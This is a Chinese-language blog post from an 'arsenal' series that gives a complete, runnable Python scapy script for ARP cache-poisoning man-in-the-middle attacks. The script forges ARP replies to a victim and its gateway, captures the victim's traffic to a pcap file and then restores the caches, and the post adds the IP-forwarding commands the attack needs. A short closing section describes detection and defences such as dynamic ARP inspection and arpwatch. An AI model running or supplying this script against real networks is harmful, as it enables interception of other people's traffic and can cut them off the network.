#我的武器库系列#之ARP中间人攻击


       中间人攻击,与在链表的两个节点之间插入一个新节点类似:渗透人员利用 ARP 协议没有任何认证这一点,向通信两端不断发送伪造的 ARP 响应报文,使两端把对方 IP 所对应的 MAC 地址替换为中间人的 MAC 地址,原本 客户端->服务端(网关等) 的请求流程就变成了 客户端->中间人->服务端。成功后,渗透人员可以在中间节点上对两端流量自由查看、篡改或转发;未加密的流量(HTTP、明文协议)会被完整暴露,TLS 等端到端加密协议则只会暴露元数据,除非客户端接受了伪造证书。

一、源代码

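# -*- coding: UTF-8 -*-
"""ARP cache-poisoning man-in-the-middle demo built on scapy.

Flow: resolve the MAC of ``target_ip`` and ``gateway_ip`` via ARP, start a
background thread that keeps sending forged ARP replies to both sides (so
each of them maps the other's IP to this host's MAC), capture
``packet_count`` IP packets to/from the target into ``arpTest.pcap``, then
restore the real bindings on both sides.

Only run this on a network you are authorised to test: it rewrites other
hosts' ARP caches, and unless IP forwarding is enabled on this host the
target loses all connectivity the moment the first forged reply lands.
Raw packet send/receive requires root/administrator privileges.
"""
import os
import sys
import threading
import signal
from scapy.all import *

interface = "en0"             # NIC to send/receive on (macOS name; e.g. "eth0" on Linux)
target_ip = "192.168.1.20"    # victim host
gateway_ip = "192.168.1.1"    # the other end of the conversation (normally the default gateway)
packet_count = 1000           # stop sniffing after this many packets
POISON_INTERVAL = 2           # seconds between forged replies; must stay below the ARP cache timeout

# conf.iface = interface
# conf.verb = 0

print("发包端口 %s" % interface)


def get_mac(ip_address):
    """Resolve ``ip_address`` to a MAC address with a broadcast ARP who-has.

    Uses scapy's ``srp`` (send/receive at layer 2) with a 2 s timeout and
    up to 10 retries; returns the hardware source address of the first reply,
    or ``None`` when nobody answered.
    """
    responses, _unanswered = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address),
        timeout=2,
        retry=10,
    )
    for _sent, received in responses:
        return received[Ether].src
    return None


gateway_mac = get_mac(gateway_ip)
target_mac = get_mac(target_ip)

# Abort instead of continuing with a missing MAC: the original only printed a
# message and then built ARP replies with ``hwdst=None``.
if target_mac is None:
    print("目标IP不可达")
    sys.exit(1)
print("[%s]的mac地址为[%s]" % (target_ip, target_mac))

if gateway_mac is None:
    print("网关不可达")
    sys.exit(1)
print("[%s]的mac地址为[%s]" % (gateway_ip, gateway_mac))

# Set by the main thread when the poisoning thread should stop.
stop_poisoning = threading.Event()


def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Undo the poisoning by broadcasting the genuine IP->MAC bindings.

    Each side gets a gratuitous ARP reply (``op=2``) addressed to the
    broadcast hardware address carrying the other side's real MAC, repeated
    five times so that a single lost frame does not leave a stale entry.
    """
    print("恢复....")
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)


def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Keep both ARP caches poisoned until ``stop_poisoning`` is set.

    Two forged ARP replies are built once and re-sent every
    ``POISON_INTERVAL`` seconds.  ``hwsrc`` is deliberately left unset so that
    scapy fills in the sending interface's MAC - that is what redirects each
    side's traffic through this host.
    """
    # "gateway_ip is at <our MAC>", delivered to the target
    to_target = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
    # "target_ip is at <our MAC>", delivered to the gateway
    to_gateway = ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac)
    print("开始实施攻击....")
    # KeyboardInterrupt is only ever raised in the main thread, so the
    # original ``except KeyboardInterrupt`` inside this loop could never fire;
    # the Event is what actually ends the loop.
    while not stop_poisoning.is_set():
        send(to_target)
        send(to_gateway)
        stop_poisoning.wait(POISON_INTERVAL)
    print("攻击结束....")


# Remind about forwarding *before* poisoning starts: once the first forged
# reply lands, a host without IP forwarding silently drops the target's traffic.
print("不要忘记开启 IP转发,否则目标IP无法上网。MAC:sudo sysctl -w net.inet.ip.forwarding=1 | linux: echo 1 > /proc/sys/net/ipv4/ip_forward")

poison_thread = threading.Thread(
    target=poison_target,
    args=(gateway_ip, gateway_mac, target_ip, target_mac),
    daemon=True,  # never keep the process alive on its own
)
poison_thread.start()

try:
    print("启动抓包程序....")
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    wrpcap("arpTest.pcap", packets)
except KeyboardInterrupt:
    pass
finally:
    # Restore on normal completion as well as on Ctrl+C: the original only
    # restored on Ctrl+C, so a run that reached packet_count left both caches
    # poisoned and the poisoning thread still running.  Stop the thread first
    # so no forged reply is sent after the real bindings go out.
    stop_poisoning.set()
    poison_thread.join(timeout=POISON_INTERVAL + 1)
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)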

当我们启动程序后,通过wireshark抓包,可见1.20与1.1的对应MAC地址已替换成中间人MAC地址

我们可以通过受攻击目标客户端主机 arp -a命令进行查看,网关地址的MAC已为中间人MAC。

当中间人不开启 IP 转发时,受攻击客户端的所有流量都会在中间人处被丢弃,无法进行网络通讯——这实际上是一次拒绝服务,也是最容易被受害者和运维人员察觉的症状。因此转发必须在发起 ARP 投毒之前就开启,而不是之后再补。

二、说点其它

       中间人攻击带来的危害还是非常大的,不过该问题也比较容易发现:可以从 IP 地址冲突告警、在客户端用 arp -a 核对网关 MAC、网络变慢或中断等多个维度查看、分析,便可快速定位问题点;在交换机上开启动态 ARP 检测(DAI)、对关键主机设置静态 ARP 绑定、部署 arpwatch 一类的 ARP 变更监控,都能有效防御或及时告警。基于 ARP 协议,我们还可以做很多有趣的事情,下节分享如何基于 ARP 生成虚假节点,形成动态防御架构。

   

